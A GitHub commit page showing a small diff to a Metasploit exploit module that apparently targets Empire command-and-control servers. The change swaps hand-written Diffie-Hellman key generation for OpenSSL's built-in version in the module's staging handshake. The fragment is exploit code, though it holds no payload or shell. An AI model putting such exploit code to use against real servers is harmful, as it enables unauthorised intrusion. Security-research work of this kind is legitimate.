Skip to content

Commit 706dc60

Browse files
Takahiro-YokoTakahiro-Yoko
committed
Use built-in Diffie-Hellman
1 parent 5984988 commit 706dc60

File tree

1 file changed

+13
-3
lines changed

1 file changed

+13
-3
lines changed

modules/exploits/linux/http/empire_skywalker.rb

Lines changed: 13 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,6 @@ class MetasploitModule < Msf::Exploit::Remote
1111

1212
GENERATOR = 2
1313
PRIME = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF
14-
KEYLENGTH = 540
1514
STAGE0 = 1
1615
STAGE1 = 2
1716
STAGE2 = 3
@@ -247,8 +246,19 @@ def exploit
247246
send_data_to_stage(staging_key, dummy, staging_key, STAGE0, session_id)
248247

249248
# stage1
250-
private_key = SecureRandom.hex(KEYLENGTH).hex
251-
public_key = GENERATOR.pow(private_key, PRIME).to_s.encode('UTF-8')
249+
dh = OpenSSL::PKey::DH.new(
250+
OpenSSL::ASN1::Sequence([
251+
OpenSSL::ASN1::Integer(PRIME),
252+
OpenSSL::ASN1::Integer(GENERATOR)
253+
]).to_der
254+
)
255+
if OpenSSL::PKey.respond_to?(:generate_key)
256+
dh = OpenSSL::PKey.generate_key(dh)
257+
else
258+
dh.generate_key!
259+
end
260+
private_key = dh.priv_key.to_i
261+
public_key = dh.pub_key.to_s
252262
res = send_data_to_stage(staging_key, public_key, staging_key, STAGE1, session_id)
253263
fail_with(Failure::Unknown, 'Failed to send the key to STAGE1') unless res && res.code == 200
254264
vprint_good('Successfully sent the key to STAGE1')

0 commit comments

Comments
 (0)